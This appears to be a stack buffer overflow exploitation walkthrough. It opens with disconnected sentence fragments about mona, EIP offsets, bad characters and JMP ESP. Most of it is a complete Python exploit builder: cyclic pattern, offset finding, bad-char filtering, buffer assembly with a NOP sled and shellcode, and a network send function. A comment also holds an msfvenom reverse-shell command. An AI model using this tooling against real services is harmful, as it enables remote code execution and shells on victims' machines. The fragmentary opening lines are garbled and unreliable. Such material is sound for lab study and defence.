C:\mona\pattern.txt with the generated pattern will have been created.
buffer variable and execute it.
buffer variable in order to check that the offset is correct.
Ctrl+F2, hit PLAY
F9 and re-launch the exploit, getting an "Access violation" with the EIP register full of Bs (0x42).
!mona bytearray -b "\x00\x<BADCHAR>", adding the bad chars found, and run the exploit again. Moreover, remove the bad chars from the
JMP ESP instruction but whose address does not contain the previously obtained bad chars.
window/Log data window, you will see several results, as it is possible to use a memory address whose file belongs to the application itself and which has everything set to "False".
EXITFUNC=THREAD so that the exploit can be launched multiple times.
msfvenom --list encoders.
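The whole workflow above (cyclic pattern, offset from the crashed EIP, BBBB check, bad-char byte array and comparison, a JMP ESP address filtered against the bad chars, final buffer) as one offline Python helper. This is an added example, not code from the original page: the EIP value, offset, bad chars, JMP ESP address, target host/port, protocol prefix and shellcode bytes are placeholders to be replaced with what mona and msfvenom actually report for the target.

```python
"""Stack-overflow exploit builder mirroring the mona/msfvenom steps (added example).
All concrete values (EIP, JMP ESP address, bad chars, host, port, shellcode) are
assumptions for illustration, not data for any real application."""
import socket
import string
import struct


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...), what !mona pc <length> writes
    to pattern.txt. Unique up to 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Offset of the four pattern bytes that landed in EIP (what !mona po <eip> does).
    EIP is a little-endian dword, so pack it back into memory order before searching."""
    idx = pattern.find(struct.pack("<I", eip))
    if idx < 0:
        raise ValueError("EIP value not found in pattern")
    return idx


def offset_check(offset: int, tail: int = 500) -> bytes:
    """A*offset + BBBB + C*tail: EIP must read 0x42424242 if the offset is right."""
    return b"A" * offset + b"B" * 4 + b"C" * tail


def badchar_array(badchars: bytes = b"\x00") -> bytes:
    """Every byte value except the ones already known to be bad, as
    !mona bytearray -b "\\x00..." generates (excluding \\x00 by default)."""
    return bytes(b for b in range(256) if b not in badchars)


def first_badchar(sent: bytes, in_memory: bytes):
    """First byte that did not survive the trip into the buffer (None if all did).
    Only the first mismatch is trustworthy: a dropped byte shifts everything after it,
    which is why the bytearray step is repeated once per bad char found."""
    for s, m in zip(sent, in_memory):
        if s != m:
            return s
    if len(in_memory) < len(sent):      # buffer was truncated at this byte
        return sent[len(in_memory)]
    return None


def addr_is_clean(addr: int, badchars: bytes) -> bool:
    """A JMP ESP address is usable only if none of its bytes is a bad char
    (the -cpb filter in !mona jmp -r esp -cpb "\\x00...")."""
    return not any(b in badchars for b in struct.pack("<I", addr))


def build_exploit(offset: int, jmp_esp: int, shellcode: bytes,
                  badchars: bytes, nops: int = 16) -> bytes:
    """A*offset | JMP ESP address (little-endian) | NOP sled | shellcode.
    Refuses to build a buffer whose tail contains a known bad char."""
    tail = struct.pack("<I", jmp_esp) + b"\x90" * nops + shellcode
    bad = sorted({b for b in tail if b in badchars})
    if bad:
        raise ValueError("bad chars in address/NOPs/shellcode: %s"
                         % ", ".join("\\x%02x" % b for b in bad))
    return b"A" * offset + tail


def send_payload(host: str, port: int, prefix: bytes, payload: bytes) -> None:
    """Deliver the buffer; prefix is whatever the protocol expects before the
    overflowing field (assumed, depends on the target service)."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(prefix + payload + b"\r\n")


if __name__ == "__main__":
    BAD = b"\x00\x0a\x0d"                 # assumed result of the bytearray iterations
    OFFSET = pattern_offset(pattern_create(2000), 0x39654138)   # assumed crash EIP
    JMP_ESP = 0x625011AF                  # placeholder: take it from the !mona jmp log
    # Placeholder shellcode; replace with msfvenom output, e.g.
    # msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread \
    #   -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python
    SHELLCODE = b"\xcc" * 8
    buf = build_exploit(OFFSET, JMP_ESP, SHELLCODE, BAD)
    print("offset=%d, buffer=%d bytes" % (OFFSET, len(buf)))
    # send_payload("<target-ip>", 9999, b"", buf)   # host, port and prefix assumed
```

Run each stage in the same order as the text: send `pattern_create(n)`, feed the crashed EIP to `pattern_offset`, confirm with `offset_check`, then loop `badchar_array` / `first_badchar` against a dump of the stack until it returns None, and only then pick a JMP ESP address that passes `addr_is_clean`.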